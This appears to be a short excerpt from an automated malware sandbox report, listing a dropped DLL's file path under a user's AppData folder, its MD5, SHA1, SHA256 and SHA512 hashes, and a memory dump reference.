SHA512 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

C:\Users\Admin\AppData\Roaming\IonicBaseband\HTCTL32.DLL

MD5 2d3b207c8a48148296156e5725426c7f
SHA1 ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256 edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA512 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

memory/4596-302-0x00000000717D0000-0x0000000071F80000-memory.dmp